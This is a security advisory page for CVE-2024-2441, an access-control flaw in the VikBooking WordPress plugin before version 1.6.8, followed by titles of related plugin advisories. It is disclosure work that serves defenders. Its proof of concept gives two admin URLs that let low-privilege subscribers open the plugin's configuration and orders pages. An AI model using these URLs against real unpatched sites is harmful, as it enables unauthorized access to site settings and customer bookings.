VikBooking < 1.6.8 – Insecure Direct Object References | CVE 2024-2441

Description

The plugin allows direct access to menus, allowing an authenticated user with subscriber privileges or above, to bypass authorization and access settings of the plugin's they shouldn't be allowed to.

Proof of Concept

https://example.com/wp-admin/admin.php?option=com_vikbooking&task=config
https://example.com/wp-admin/admin.php?option=com_vikbooking&task=orders

Affects Plugins

vikbooking

Fixed in 1.6.8

References

CVE

CVE-2024-2441

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CWE-639

CVSS

3.5 (low)

Miscellaneous

Submitter

cyc707

Verified

Yes

WPVDB ID

9647e273-5724-4a02-868d-9b79f4bb2b79

Timeline

Publicly Published

2024-04-19 (about 1 year ago)

Added

2024-04-19 (about 1 year ago)

Last Updated

2024-04-19 (about 1 year ago)

Other

Published

Title

Published

2025-12-06

Title

Thim Elementor Kit < 1.3.4 - Authenticated (Contributor+) Insecure Direct Object Reference

Published

2025-03-07

Title

FooGallery – Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel < 2.4.30 - Insecure Direct Object Reference to Authenticated (Custom+) Arbitrary Post/Page Updates

Published

2024-11-20

Title

Button Block – Get fully customizable & multi-functional buttons < 1.1.5 - Authenticated (Contributor+) Post Disclosure

Published

2024-12-23

Title

Content No Cache: prevent specific content from being cached < 0.1.3 - Unauthenticated Private Content Disclosure

Published

2025-10-21

Title

All in One Time Clock Lite – Tracking Employee Time Has Never Been Easier < 2.0.1 - Insecure Direct Object Reference to Authenticated (Subscriber+) Arbitrary Clocking In/Out